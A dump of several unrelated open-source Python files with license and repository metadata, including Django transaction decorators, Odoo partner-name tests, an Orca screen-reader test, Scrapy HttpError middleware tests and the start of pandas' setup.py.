runs successfully, a commit is made; if the viewfunc produces an exception,
a rollback is made. This is one of the most common ways to do transaction
control in Web apps.
"""
def inner_commit_on_success(func, db=None):
def _commit_on_success(*args, **kw):
try:
enter_transaction_management(using=db)
managed(True, using=db)
try:
res = func(*args, **kw)
except:
# All exceptions must be handled here (even string ones).
if is_dirty(using=db):
rollback(using=db)
raise
else:
if is_dirty(using=db):
try:
commit(using=db)
except:
rollback(using=db)
raise
return res
finally:
leave_transaction_management(using=db)
return wraps(func)(_commit_on_success)
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return inner_commit_on_success(using, DEFAULT_DB_ALIAS)
return lambda func: inner_commit_on_success(func, using)
def commit_manually(using=None):
"""
Decorator that activates manual transaction control. It just disables
automatic transaction control and doesn't do any commit/rollback of its
own -- it's up to the user to call the commit and rollback functions
themselves.
"""
def inner_commit_manually(func, db=None):
def _commit_manually(*args, **kw):
try:
enter_transaction_management(using=db)
managed(True, using=db)
return func(*args, **kw)
finally:
leave_transaction_management(using=db)
return wraps(func)(_commit_manually)
# Note that although the first argument is *called* `using`, it
# may actually be a function; @autocommit and @autocommit('foo')
# are both allowed forms.
if using is None:
using = DEFAULT_DB_ALIAS
if callable(using):
return inner_commit_manually(using, DEFAULT_DB_ALIAS)
return lambda func: inner_commit_manually(func, using)
|
gpl-3.0
|
StevenBlack/phantomjs
|
src/qt/qtwebkit/Tools/QueueStatusServer/handlers/updatebase.py
|
143
|
1902
|
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from google.appengine.api import users
from google.appengine.ext import webapp, db
class UpdateBase(webapp.RequestHandler):
def _int_from_request(self, name):
string_value = self.request.get(name)
try:
int_value = int(string_value)
return int_value
except ValueError, TypeError:
pass
return None
|
bsd-3-clause
|
sultanoid/Gabriel
|
server/gabriel/common/protocol.py
|
1
|
2299
|
#!/usr/bin/env python
#
# Cloudlet Infrastructure for Mobile Computing
#
# Author: Kiryong Ha <krha@cmu.edu>
# Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Protocol_client(object):
JSON_KEY_CONTROL_MESSAGE = "control"
JSON_KEY_RESULT_MESSAGE = "result"
JSON_KEY_FRAME_ID = "frame_id"
JSON_KEY_ENGINE_ID = "engine_id"
JSON_KEY_TOKEN_INJECT = "token_inject"
JSON_KEY_STATUS = "status"
JSON_KEY_DATA_SIZE = "data_size"
class Protocol_sensor(object):
JSON_KEY_SENSOR_TYPE = "sensor_type"
JSON_VALUE_SENSOR_TYPE_JPEG = "mjpeg"
JSON_VALUE_SENSOR_TYPE_ACC = "acc"
JSON_VALUE_SENSOR_TYPE_GPS = "gps"
JSON_VALUE_SENSOR_TYPE_AUDIO = "audio"
class Protocol_measurement(object):
JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME = "control_recv_from_mobile_time"
JSON_KEY_APP_RECV_TIME = "app_recv_time"
JSON_KEY_APP_SYMBOLIC_TIME = "app_symbolic_time"
JSON_KEY_APP_SENT_TIME = "app_sent_time"
JSON_KEY_UCOMM_RECV_TIME = "ucomm_recv_time"
JSON_KEY_UCOMM_SENT_TIME = "ucomm_sent_time"
JSON_KEY_CONTROL_SENT_TO_MOBILE_TIME = "control_sent_to_mobile_time"
class Protocol_result(object):
JSON_KEY_STATUS = "status"
JSON_KEY_IMAGE = "image"
JSON_KEY_SPEECH = "speech"
JSON_KEY_IMAGES_ANIMATION = "animation"
JSON_KEY_VIDEO = "video"
class Protocol_control(object):
JSON_KEY_SENSOR_TYPE_IMAGE = Protocol_sensor.JSON_VALUE_SENSOR_TYPE_JPEG
JSON_KEY_SENSOR_TYPE_ACC = Protocol_sensor.JSON_VALUE_SENSOR_TYPE_ACC
JSON_KEY_SENSOR_TYPE_AUDIO = Protocol_sensor.JSON_VALUE_SENSOR_TYPE_AUDIO
JSON_KEY_FPS = "fps";
JSON_KEY_IMG_WIDTH = "img_width";
JSON_KEY_IMG_HEIGHT = "img_height";
|
apache-2.0
|
OCA/partner-contact
|
partner_second_lastname/tests/test_name.py
|
1
|
7044
|
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
# Copyright 2015 Grupo ESOC Ingenierรญa de Servicios, S.L.U.
# Copyright 2015 Antiun Ingenieria S.L. - Antonio Espinosa
from odoo.tests.common import TransactionCase
from odoo.addons.partner_firstname.tests.base import MailInstalled
class CompanyCase(TransactionCase):
"""Test ``res.partner`` when it is a company."""
def setUp(self):
super(CompanyCase, self).setUp()
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
def tearDown(self):
try:
new = self.env["res.partner"].create(
{"is_company": True, "name": self.name}
)
# Name should be cleaned of unneeded whitespace
clean_name = " ".join(self.name.split(None))
# Check it's saved OK
self.assertEqual(new.name, clean_name, "Saved company name is wrong.")
# Check it's saved in the lastname
self.assertEqual(
new.lastname,
clean_name,
"Company name should be saved in the lastname field.",
)
# Check that other fields are empty
self.assertEqual(
new.firstname, False, "Company first name must always be empty."
)
self.assertEqual(
new.lastname2, False, "Company last name 2 must always be empty."
)
finally:
super(CompanyCase, self).tearDown()
def test_long_name(self):
"""Create a company with a long name."""
self.name = "Sรถme very lรณng nรขme"
def test_short_name(self):
"""Create a company with a short name."""
self.name = "Shoลt"
def test_whitespace_before(self):
"""Create a company with name prefixed with whitespace."""
self.name = " Wฤฅitespace befรฒre"
def test_whitespace_after(self):
"""Create a company with name suffixed with whitespace."""
self.name = "Whitespรขce aftรฉr "
def test_whitespace_inside(self):
"""Create a company with whitespace inside the name."""
self.name = "Whitespacรฉ รฏnside"
def test_whitespace_everywhere(self):
"""Create a company with whitespace everywhere in the name."""
self.name = " A lot รถf whitespace "
class PersonCase(TransactionCase):
"""Test ``res.partner`` when it is a person."""
model = "res.partner"
context = dict()
def setUp(self):
super(PersonCase, self).setUp()
self.env["ir.config_parameter"].set_param(
"partner_names_order", "last_first_comma"
)
self.firstname = "Fรญrstname"
self.lastname = "Lร stname1"
self.lastname2 = "Lรขstname2"
self.template = "%(last1)s %(last2)s, %(first)s"
def tearDown(self):
try:
new = self.env[self.model].with_context(self.context).create(self.params)
# Check that each individual field matches
self.assertEqual(self.firstname, new.firstname, "First name saved badly.")
self.assertEqual(self.lastname, new.lastname, "Last name 1 saved badly.")
self.assertEqual(self.lastname2, new.lastname2, "Last name 2 saved badly.")
# Check that name gets saved fine
self.assertEqual(
self.template
% (
{
"last1": self.lastname,
"last2": self.lastname2,
"first": self.firstname,
}
),
new.name,
"Name saved badly.",
)
finally:
super(PersonCase, self).tearDown()
def test_firstname_first(self):
"""Create a person setting his first name first."""
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
self.template = "%(first)s %(last1)s %(last2)s"
self.params = {
"is_company": False,
"name": "{} {} {}".format(self.firstname, self.lastname, self.lastname2),
}
def test_firstname_last(self):
"""Create a person setting his first name last."""
self.params = {
"is_company": False,
"name": "{} {}, {}".format(self.lastname, self.lastname2, self.firstname),
}
def test_firstname_last_wo_comma(self):
"""Create a person setting his first name last and the order as 'last_first'"""
self.env["ir.config_parameter"].set_param("partner_names_order", "last_first")
self.template = "%(last1)s %(last2)s %(first)s"
self.params = {
"is_company": False,
"name": "{} {} {}".format(self.lastname, self.lastname2, self.firstname),
}
def test_firstname_only(self):
"""Create a person setting his first name only."""
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
self.firstname = self.lastname2 = False
self.template = "%(last1)s"
self.params = {
"is_company": False,
"name": self.lastname,
}
def test_firstname_lastname_only(self):
"""Create a person setting his first name and last name 1 only."""
self.env["ir.config_parameter"].set_param("partner_names_order", "first_last")
self.lastname2 = False
self.template = "%(first)s %(last1)s"
self.params = {
"is_company": False,
"name": "{} {}".format(self.firstname, self.lastname),
}
def test_lastname_firstname_only(self):
"""Create a person setting his last name 1 and first name only."""
self.lastname2 = False
self.template = "%(last1)s, %(first)s"
self.params = {
"is_company": False,
"name": "{}, {}".format(self.lastname, self.firstname),
}
def test_lastname_firstname_only_wo_comma(self):
"""Create a person setting his last name 1 and first name only.
Set order to 'last_first' to test name split without comma"""
self.env["ir.config_parameter"].set_param("partner_names_order", "last_first")
self.lastname2 = False
self.template = "%(last1)s %(first)s"
self.params = {
"is_company": False,
"name": "{} {}".format(self.lastname, self.firstname),
}
def test_separately(self):
"""Create a person setting separately all fields."""
self.params = {
"is_company": False,
"firstname": self.firstname,
"lastname": self.lastname,
"lastname2": self.lastname2,
}
class UserCase(PersonCase, MailInstalled):
"""Test ``res.users``."""
model = "res.users"
context = {"default_login": "user@example.com"}
def tearDown(self):
# Skip if ``mail`` is installed
if not self.mail_installed():
super(UserCase, self).tearDown()
|
agpl-3.0
|
GNOME/orca
|
test/keystrokes/gtk3-demo/role_column_header.py
|
1
|
5313
|
#!/usr/bin/python
"""Test of column header output."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(KeyComboAction("End"))
sequence.append(KeyComboAction("<Shift>Right"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Down"))
sequence.append(KeyComboAction("Return"))
sequence.append(PauseAction(3000))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Shift>ISO_Left_Tab"))
sequence.append(utils.AssertPresentationAction(
"1. Bug number column header",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Bug number table column header'",
" VISIBLE: 'Bug number table column header', cursor=1",
"SPEECH OUTPUT: 'Bug number table column header not selected'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
"2. Severity column header",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity table column header'",
" VISIBLE: 'Severity table column header', cursor=1",
"SPEECH OUTPUT: 'Severity table column header'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Right"))
sequence.append(utils.AssertPresentationAction(
"3. Description column header",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Description table column header'",
" VISIBLE: 'Description table column header', cursor=1",
"SPEECH OUTPUT: 'Description table column header'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Down"))
sequence.append(utils.AssertPresentationAction(
"4. Enter table",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Fixed? column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: '< > Fixed? 60482 Normal scrollab', cursor=1",
"SPEECH OUTPUT: 'Fixed?'",
"SPEECH OUTPUT: 'check box not checked.'",
"SPEECH OUTPUT: '60482.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'scrollable notebooks and hidden tabs.'",
"SPEECH OUTPUT: 'image.'"]))
# GtkTreeView swallows this keypress (for all users; not just Orca users).
sequence.append(KeyComboAction("Left"))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Left"))
sequence.append(utils.AssertPresentationAction(
"5. Normal cell",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"SPEECH OUTPUT: 'Severity column header Normal.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"6. Normal cell basic Where Am I",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"SPEECH OUTPUT: 'table.'",
"SPEECH OUTPUT: 'Severity.'",
"SPEECH OUTPUT: 'table cell.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'column 3 of 6'",
"SPEECH OUTPUT: 'row 1 of 14.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"7. Normal cell detailed Where Am I",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"BRAILLE LINE: 'gtk3-demo application List Store frame table Severity column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: 'Normal scrollable notebooks and ', cursor=1",
"SPEECH OUTPUT: 'table.'",
"SPEECH OUTPUT: 'Severity.'",
"SPEECH OUTPUT: 'table cell.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'column 3 of 6'",
"SPEECH OUTPUT: 'row 1 of 14.'",
"SPEECH OUTPUT: 'table.'",
"SPEECH OUTPUT: 'Severity.'",
"SPEECH OUTPUT: 'table cell.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'column 3 of 6'",
"SPEECH OUTPUT: 'row 1 of 14.'",
"SPEECH OUTPUT: 'Fixed?'",
"SPEECH OUTPUT: 'check box not checked.'",
"SPEECH OUTPUT: '60482.'",
"SPEECH OUTPUT: 'Normal.'",
"SPEECH OUTPUT: 'scrollable notebooks and hidden tabs.'",
"SPEECH OUTPUT: 'image.'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("Left"))
sequence.append(utils.AssertPresentationAction(
"8. 60482 cell",
["BRAILLE LINE: 'gtk3-demo application List Store frame table Bug number column header < > Fixed? 60482 Normal scrollable notebooks and hidden tabs '",
" VISIBLE: '60482 Normal scrollable notebook', cursor=1",
"SPEECH OUTPUT: 'Bug number column header 60482.'"]))
sequence.append(KeyComboAction("<Alt>F4"))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
|
lgpl-2.1
|
KenjiTakahashi/td
|
setup.py
|
1
|
1625
|
# -*- coding: utf-8 -*-
# This is a part of td @ http://github.com/KenjiTakahashi/td
# Karol "Kenji Takahashi" Woลบniak ยฉ 2012 - 2013
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from setuptools import setup
from td.main import __version__
setup(
name='td',
version=__version__,
description='A non-offensive, per project ToDo manager.',
long_description=open('README.md').read(),
author='Karol "Kenji Takahashi" Woลบniak',
author_email='wozniakk@gmail.com',
license='GPL3',
url='http://github.com/KenjiTakahashi/td',
packages=['td'],
scripts=['scripts/td'],
classifiers=[f.strip() for f in """
Development Status :: 4 - Beta
Environment :: Console
Intended Audience :: Developers
Intended Audience :: End Users/Desktop
License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)
Natural Language :: English
Operating System :: OS Independent
Programming Language :: Python :: 3
Topic :: Utilities
""".splitlines() if f.strip()]
)
|
gpl-3.0
|
agreen/scrapy
|
tests/test_spidermiddleware_httperror.py
|
125
|
6935
|
from unittest import TestCase
from testfixtures import LogCapture
from twisted.trial.unittest import TestCase as TrialTestCase
from twisted.internet import defer
from scrapy.utils.test import get_crawler
from tests.mockserver import MockServer
from scrapy.http import Response, Request
from scrapy.spiders import Spider
from scrapy.spidermiddlewares.httperror import HttpErrorMiddleware, HttpError
from scrapy.settings import Settings
class _HttpErrorSpider(Spider):
name = 'httperror'
start_urls = [
"http://localhost:8998/status?n=200",
"http://localhost:8998/status?n=404",
"http://localhost:8998/status?n=402",
"http://localhost:8998/status?n=500",
]
bypass_status_codes = set()
def __init__(self, *args, **kwargs):
super(_HttpErrorSpider, self).__init__(*args, **kwargs)
self.failed = set()
self.skipped = set()
self.parsed = set()
def start_requests(self):
for url in self.start_urls:
yield Request(url, self.parse, errback=self.on_error)
def parse(self, response):
self.parsed.add(response.url[-3:])
def on_error(self, failure):
if isinstance(failure.value, HttpError):
response = failure.value.response
if response.status in self.bypass_status_codes:
self.skipped.add(response.url[-3:])
return self.parse(response)
# it assumes there is a response attached to failure
self.failed.add(failure.value.response.url[-3:])
return failure
def _responses(request, status_codes):
responses = []
for code in status_codes:
response = Response(request.url, status=code)
response.request = request
responses.append(response)
return responses
class TestHttpErrorMiddleware(TestCase):
def setUp(self):
self.spider = Spider('foo')
self.mw = HttpErrorMiddleware(Settings({}))
self.req = Request('http://scrapytest.org')
self.res200, self.res404 = _responses(self.req, [200, 404])
def test_process_spider_input(self):
self.assertEquals(None,
self.mw.process_spider_input(self.res200, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, self.res404, self.spider)
def test_process_spider_exception(self):
self.assertEquals([],
self.mw.process_spider_exception(self.res404, \
HttpError(self.res404), self.spider))
self.assertEquals(None,
self.mw.process_spider_exception(self.res404, \
Exception(), self.spider))
def test_handle_httpstatus_list(self):
res = self.res404.copy()
res.request = Request('http://scrapytest.org',
meta={'handle_httpstatus_list': [404]})
self.assertEquals(None,
self.mw.process_spider_input(res, self.spider))
self.spider.handle_httpstatus_list = [404]
self.assertEquals(None,
self.mw.process_spider_input(self.res404, self.spider))
class TestHttpErrorMiddlewareSettings(TestCase):
"""Similar test, but with settings"""
def setUp(self):
self.spider = Spider('foo')
self.mw = HttpErrorMiddleware(Settings({'HTTPERROR_ALLOWED_CODES': (402,)}))
self.req = Request('http://scrapytest.org')
self.res200, self.res404, self.res402 = _responses(self.req, [200, 404, 402])
def test_process_spider_input(self):
self.assertEquals(None,
self.mw.process_spider_input(self.res200, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, self.res404, self.spider)
self.assertEquals(None,
self.mw.process_spider_input(self.res402, self.spider))
def test_meta_overrides_settings(self):
request = Request('http://scrapytest.org',
meta={'handle_httpstatus_list': [404]})
res404 = self.res404.copy()
res404.request = request
res402 = self.res402.copy()
res402.request = request
self.assertEquals(None,
self.mw.process_spider_input(res404, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, res402, self.spider)
def test_spider_override_settings(self):
self.spider.handle_httpstatus_list = [404]
self.assertEquals(None,
self.mw.process_spider_input(self.res404, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, self.res402, self.spider)
class TestHttpErrorMiddlewareHandleAll(TestCase):
def setUp(self):
self.spider = Spider('foo')
self.mw = HttpErrorMiddleware(Settings({'HTTPERROR_ALLOW_ALL': True}))
self.req = Request('http://scrapytest.org')
self.res200, self.res404, self.res402 = _responses(self.req, [200, 404, 402])
def test_process_spider_input(self):
self.assertEquals(None,
self.mw.process_spider_input(self.res200, self.spider))
self.assertEquals(None,
self.mw.process_spider_input(self.res404, self.spider))
def test_meta_overrides_settings(self):
request = Request('http://scrapytest.org',
meta={'handle_httpstatus_list': [404]})
res404 = self.res404.copy()
res404.request = request
res402 = self.res402.copy()
res402.request = request
self.assertEquals(None,
self.mw.process_spider_input(res404, self.spider))
self.assertRaises(HttpError,
self.mw.process_spider_input, res402, self.spider)
class TestHttpErrorMiddlewareIntegrational(TrialTestCase):
def setUp(self):
self.mockserver = MockServer()
self.mockserver.__enter__()
def tearDown(self):
self.mockserver.__exit__(None, None, None)
@defer.inlineCallbacks
def test_middleware_works(self):
crawler = get_crawler(_HttpErrorSpider)
yield crawler.crawl()
assert not crawler.spider.skipped, crawler.spider.skipped
self.assertEqual(crawler.spider.parsed, {'200'})
self.assertEqual(crawler.spider.failed, {'404', '402', '500'})
@defer.inlineCallbacks
def test_logging(self):
crawler = get_crawler(_HttpErrorSpider)
with LogCapture() as log:
yield crawler.crawl(bypass_status_codes={402})
self.assertEqual(crawler.spider.parsed, {'200', '402'})
self.assertEqual(crawler.spider.skipped, {'402'})
self.assertEqual(crawler.spider.failed, {'404', '500'})
self.assertIn('Ignoring response <404', str(log))
self.assertIn('Ignoring response <500', str(log))
self.assertNotIn('Ignoring response <200', str(log))
self.assertNotIn('Ignoring response <402', str(log))
|
bsd-3-clause
|
PoisonBOx/jieba
|
test/test_whoosh_file.py
|
65
|
1089
|
# -*- coding: UTF-8 -*-
from __future__ import unicode_literals
import sys
import os
sys.path.append("../")
from whoosh.index import create_in
from whoosh.fields import *
from whoosh.qparser import QueryParser
from jieba.analyse import ChineseAnalyzer
analyzer = ChineseAnalyzer()
schema = Schema(title=TEXT(stored=True), path=ID(stored=True), content=TEXT(stored=True, analyzer=analyzer))
if not os.path.exists("tmp"):
os.mkdir("tmp")
ix = create_in("tmp", schema)
writer = ix.writer()
file_name = sys.argv[1]
with open(file_name,"rb") as inf:
i=0
for line in inf:
i+=1
writer.add_document(
title="line"+str(i),
path="/a",
content=line.decode('gbk','ignore')
)
writer.commit()
searcher = ix.searcher()
parser = QueryParser("content", schema=ix.schema)
for keyword in ("ๆฐดๆๅฐๅง","ไฝ ","first","ไธญๆ","ไบคๆขๆบ","ไบคๆข"):
print("result of " + keyword)
q = parser.parse(keyword)
results = searcher.search(q)
for hit in results:
print(hit.highlights("content"))
print("="*10)
|
mit
|
winklerand/pandas
|
setup.py
|
1
|
31821
|
#!/usr/bin/env python
"""
Parts of this file were taken from the pyzmq project
(https://github.com/zeromq/pyzmq) which have been permitted for use under the
BSD license. Parts are from lxml (https://github.com/lxml/lxml)
"""
import os
from os.path import join as pjoin
import sys
import shutil
from distutils.version import LooseVersion
# versioning
import versioneer
cmdclass = versioneer.get_cmdclass()
def is_platform_windows():
return sys.platform == 'win32' or sys.platform == 'cygwin'
def is_platform_linux():
return sys.platform == 'linux2'
def is_platform_mac():
return sys.platform == 'darwin'
min_cython_ver = '0.23'
try:
import Cython
ver = Cython.__version__
_CYTHON_INSTALLED = ver >= LooseVersion(min_cython_ver)
except ImportError:
_CYTHON_INSTALLED = False
try:
import pkg_resources
from setuptools import setup, Command
_have_setuptools = True
except ImportError:
# no setuptools installed
from distutils.core import setup, Command
_have_setuptools = False
setuptools_kwargs = {}
min_numpy_ver = '1.9.0'
if sys.version_info[0] >= 3:
setuptools_kwargs = {'zip_safe': False,
'install_requires': ['python-dateutil >= 2',
'pytz >= 2011k',
'numpy >= %s' % min_numpy_ver],
'setup_requires': ['numpy >= %s' % min_numpy_ver]}
if not _have_setuptools:
sys.exit("need setuptools/distribute for Py3k"
"\n$ pip install distribute")
else:
setuptools_kwargs = {
'install_requires': ['python-dateutil',
'pytz >= 2011k',
'numpy >= %s' % min_numpy_ver],
'setup_requires': ['numpy >= %s' % min_numpy_ver],
'zip_safe': False,
}
if not _have_setuptools:
try:
import numpy # noqa:F401
import dateutil # noqa:F401
setuptools_kwargs = {}
except ImportError:
sys.exit("install requires: 'python-dateutil < 2','numpy'."
" use pip or easy_install."
"\n $ pip install 'python-dateutil < 2' 'numpy'")
from distutils.extension import Extension # noqa:E402
from distutils.command.build import build # noqa:E402
from distutils.command.build_ext import build_ext as _build_ext # noqa:E402
try:
if not _CYTHON_INSTALLED:
raise ImportError('No supported version of Cython installed.')
try:
from Cython.Distutils.old_build_ext import old_build_ext as _build_ext # noqa:F811,E501
except ImportError:
# Pre 0.25
from Cython.Distutils import build_ext as _build_ext
cython = True
except ImportError:
cython = False
if cython:
try:
try:
from Cython import Tempita as tempita
except ImportError:
import tempita
except ImportError:
raise ImportError('Building pandas requires Tempita: '
'pip install Tempita')
_pxi_dep_template = {
'algos': ['_libs/algos_common_helper.pxi.in',
'_libs/algos_take_helper.pxi.in',
'_libs/algos_rank_helper.pxi.in'],
'groupby': ['_libs/groupby_helper.pxi.in'],
'join': ['_libs/join_helper.pxi.in', '_libs/join_func_helper.pxi.in'],
'reshape': ['_libs/reshape_helper.pxi.in'],
'hashtable': ['_libs/hashtable_class_helper.pxi.in',
'_libs/hashtable_func_helper.pxi.in'],
'index': ['_libs/index_class_helper.pxi.in'],
'sparse': ['_libs/sparse_op_helper.pxi.in'],
'interval': ['_libs/intervaltree.pxi.in']}
_pxifiles = []
_pxi_dep = {}
for module, files in _pxi_dep_template.items():
pxi_files = [pjoin('pandas', x) for x in files]
_pxifiles.extend(pxi_files)
_pxi_dep[module] = pxi_files
class build_ext(_build_ext):
def build_extensions(self):
# if builing from c files, don't need to
# generate template output
if cython:
for pxifile in _pxifiles:
# build pxifiles first, template extention must be .pxi.in
assert pxifile.endswith('.pxi.in')
outfile = pxifile[:-3]
if (os.path.exists(outfile) and
os.stat(pxifile).st_mtime < os.stat(outfile).st_mtime):
# if .pxi.in is not updated, no need to output .pxi
continue
with open(pxifile, "r") as f:
tmpl = f.read()
pyxcontent = tempita.sub(tmpl)
with open(outfile, "w") as f:
f.write(pyxcontent)
numpy_incl = pkg_resources.resource_filename('numpy', 'core/include')
for ext in self.extensions:
if (hasattr(ext, 'include_dirs') and
numpy_incl not in ext.include_dirs):
ext.include_dirs.append(numpy_incl)
_build_ext.build_extensions(self)
DESCRIPTION = ("Powerful data structures for data analysis, time series,"
"and statistics")
LONG_DESCRIPTION = """
**pandas** is a Python package providing fast, flexible, and expressive data
structures designed to make working with structured (tabular, multidimensional,
potentially heterogeneous) and time series data both easy and intuitive. It
aims to be the fundamental high-level building block for doing practical,
**real world** data analysis in Python. Additionally, it has the broader goal
of becoming **the most powerful and flexible open source data analysis /
manipulation tool available in any language**. It is already well on its way
toward this goal.
pandas is well suited for many different kinds of data:
- Tabular data with heterogeneously-typed columns, as in an SQL table or
Excel spreadsheet
- Ordered and unordered (not necessarily fixed-frequency) time series data.
- Arbitrary matrix data (homogeneously typed or heterogeneous) with row and
column labels
- Any other form of observational / statistical data sets. The data actually
need not be labeled at all to be placed into a pandas data structure
The two primary data structures of pandas, Series (1-dimensional) and DataFrame
(2-dimensional), handle the vast majority of typical use cases in finance,
statistics, social science, and many areas of engineering. For R users,
DataFrame provides everything that R's ``data.frame`` provides and much
more. pandas is built on top of `NumPy <http://www.numpy.org>`__ and is
intended to integrate well within a scientific computing environment with many
other 3rd party libraries.
Here are just a few of the things that pandas does well:
- Easy handling of **missing data** (represented as NaN) in floating point as
well as non-floating point data
- Size mutability: columns can be **inserted and deleted** from DataFrame and
higher dimensional objects
- Automatic and explicit **data alignment**: objects can be explicitly
aligned to a set of labels, or the user can simply ignore the labels and
let `Series`, `DataFrame`, etc. automatically align the data for you in
computations
- Powerful, flexible **group by** functionality to perform
split-apply-combine operations on data sets, for both aggregating and
transforming data
- Make it **easy to convert** ragged, differently-indexed data in other
Python and NumPy data structures into DataFrame objects
- Intelligent label-based **slicing**, **fancy indexing**, and **subsetting**
of large data sets
- Intuitive **merging** and **joining** data sets
- Flexible **reshaping** and pivoting of data sets
- **Hierarchical** labeling of axes (possible to have multiple labels per
tick)
- Robust IO tools for loading data from **flat files** (CSV and delimited),
Excel files, databases, and saving / loading data from the ultrafast **HDF5
format**
- **Time series**-specific functionality: date range generation and frequency
conversion, moving window statistics, moving window linear regressions,
date shifting and lagging, etc.
Many of these principles are here to address the shortcomings frequently
experienced using other languages / scientific research environments. For data
scientists, working with data is typically divided into multiple stages:
munging and cleaning data, analyzing / modeling it, then organizing the results
of the analysis into a form suitable for plotting or tabular display. pandas is
the ideal tool for all of these tasks.
Notes
-----
Windows binaries built against NumPy 1.8.1
"""
DISTNAME = 'pandas'
LICENSE = 'BSD'
AUTHOR = "The PyData Development Team"
EMAIL = "pydata@googlegroups.com"
URL = "http://pandas.pydata.org"
DOWNLOAD_URL = ''
CLASSIFIERS = [
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Cython',
'Topic :: Scientific/Engineering']
class CleanCommand(Command):
